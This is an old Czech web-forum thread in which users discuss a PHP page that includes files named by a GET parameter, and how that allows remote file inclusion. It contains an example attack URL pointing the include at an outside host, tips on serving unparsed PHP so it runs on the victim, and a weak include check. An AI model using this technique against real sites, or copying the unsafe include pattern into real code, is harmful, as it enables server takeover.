Registrace nového uživatele     Návod     Kluby     Archív  Lopuchu     Lopuch.cz  

Modrá je dobrá
zelená je lepší

Lopuch.cz
Jméno:
Heslo:
Podpora LCD:
 
Klub Web [ŽP: neomezená] (kategorie Programování) moderuje Kdokoliv.
Archiv
Domovská stránka aktualizována 28.7.2019 17:46
  
  Nastavení klubu     Nastavení práv     Homepage     Anketa     Přítomní     Oblíbené     Lopuch     Kategorie  
autor: 
text: 
vyplnit a 
Help
 Titulek, text příspěvku  
Opište pozpátku následující text bez prostředního znaku: ulvkudw
[ 4075 ] <Novější  <<<Nejnovější  Nejstarší>>>  Starší>  
pepak pepak - Pepak.net 29.4.2007 05:55  4710
Kdokoliv: Jisteze to jde. Nepouzijes ovsem include(), jehoz funkci je vlozit a provest nejaky soubor, ale treba file(), fpassthru() a podobne...
johny_g Johny_G - Relaxační terapie pro lopušáky ZDARMA! 29.4.2007 00:13  4709
BIGHead [4708]: Uáááááh :-)
bighead BIGHead Pořádáte akci, vyzkoušejte - naše moderátory 28.4.2007 23:18  4708
kdokolivNepochopil :). Je to pro me celkem spanelska vesnice, ale chci do toho aspon trochu proniknout...

Pepak: nedelam -> netusim zatim jak na to ;)
kdokoliv Kdokoliv Nevidím důvod dělat cokoliv bezdůvodně. - http://kkl2401.wz.cz 28.4.2007 23:01  4707
pepak [4705]: Ano, dobra, interpretovat to nebude, tak to posle zpatky jako plaintext. To ho pak to PHP na tom druhem serveru vezme a zacne interpretovat? Ja myslel, ze proste u remote includu tohle PHP nedela (co kdybych chtel skutecne includnout ze vzdaleneho serveru obycejny plaintext, ktery cirou nahodou obsahuje veci interpretovatelne PHPkem - to prece taky nejak musi jit).
pepak pepak - Pepak.net 28.4.2007 22:10  4706
(Nemluve tedy o tom, ze nevidim duvod, proc by muj PHP skript nemohl udelat vystup zacinajici <?php ...)
pepak pepak - Pepak.net 28.4.2007 22:09  4705
Kdokoliv: Proc by mel muj server interpretovat to PHP? Na mem serveru jsem to ja, kdo rika, co se bude a nebude interpretovat...

BigHead: Ano, muzes. Delas to?
johny_g Johny_G - Relaxační terapie pro lopušáky ZDARMA! 28.4.2007 22:05  4704
Kdokoliv [4703]: Máš vlastně pravdu. Za normálních okolností by se skript interpretoval. Ale... Záleží na tom, jak je ta či ona inkluze nastavená. Ideální je, když je v adrese i přípona a můžeš mu narvat txt s php skriptem. V opačném případě bych asi zkusil podstrčit skript ze serveru bez PHP.
kdokoliv Kdokoliv Nevidím důvod dělat cokoliv bezdůvodně. - http://kkl2401.wz.cz 28.4.2007 21:55  4703
BIGHead [4701]: Nepochopils, o cemu mluvis. Ja zase na oplatku to nepochopil predtim, cekal jsem, ze problem je v necem uplne jinym.
Johny_G [4700]: A jses si jistej, nechces si to radsi overit? Ten vzdalenej server nevi o tom, ze je includovan, ten je pozadat GET metodou o nejaky zdroj, ten je nahodou PHP scriptem, tedy ho provede, rozhodne neposle zpatky PHP zdrojak, to by byla bezpecnostni dira jako prase (na strane PHP jako takoveho).
johny_g Johny_G - Relaxační terapie pro lopušáky ZDARMA! 28.4.2007 21:43  4702
BIGHead [4699]: Já používám tento způsob: 
if (file_exists($obsah)) {include $obsah;}

Ale mrzí mě, že ti to prozrazuju, fakt jsem si to vždycky chtěl vyzkoušet :-).


BIGHead [4701]: Protože na IC za tebe ten GET udělají register_globals. Když jsou na serveru zakázané, musíš si tu proměnnou vždy GETem vytáhnout z adresy.
bighead BIGHead Pořádáte akci, vyzkoušejte - naše moderátory 28.4.2007 21:39  4701
kdokolivA proč to teda bez GETu nefungovalo??
johny_g Johny_G - Relaxační terapie pro lopušáky ZDARMA! 28.4.2007 21:38  4700
Kdokoliv [4698]: No obávám se, že by se provedl až na straně bigheada :-). Tak PHP injection funguje. To mě zarazilo spíš, než globals, které já stále ještě používám a děsím se, kdy WZ přeskočí na nové PHP :-)).
bighead BIGHead Pořádáte akci, vyzkoušejte - naše moderátory 28.4.2007 21:37  4699
pepakAle ja mu snad můžu říct, aby jako id nebral nic z jinych domen nebo ne?
Teď teda absolutně netušim jestli to jde udělat, ani netuším jak bych to provedl...
Nebo je jiný "bezpečnější" způsob?
kdokoliv Kdokoliv Nevidím důvod dělat cokoliv bezdůvodně. - http://kkl2401.wz.cz 28.4.2007 21:37  4698
Boze to me teda vubec nenapadlo, ze bych opravdu moh nekdo myslet vazne, ze $id prijde GETem a ze tedy problem je prave v tom...

pepak [4697]: To by asi moc nefungovalo, ne? Ten vzdalenej script by interpretovalo PHP uz na pepak.net, a tudiz by z toho moc nezbylo, nebo ne?
pepak pepak - Pepak.net 28.4.2007 21:31  4697
Bighead: Nejslabsi misto to ma v tom include. Rekneme, ze ten skript spustim jako http://www.bighead.cz/skript.php?id=http://www.pepak.net/hack
bighead BIGHead Pořádáte akci, vyzkoušejte - naše moderátory 28.4.2007 21:29  4696
Johny_G$_GET['id'] - pomohlo to, me to napadlo uz prve, ale narval jsem mu to rovnou do toho (!isset($_GET['id'])): - a to teda nejak nepobral :). Odkaz sem mozna casem hodim, treba mi poradite kde to ma nejslabsi misto (bude jich tam hooodne :)
[ 4075 ] <Novější  <<<Nejnovější  Nejstarší>>>  Starší>  

(c) 2001-2011 Lopuch.cz   
Kontakt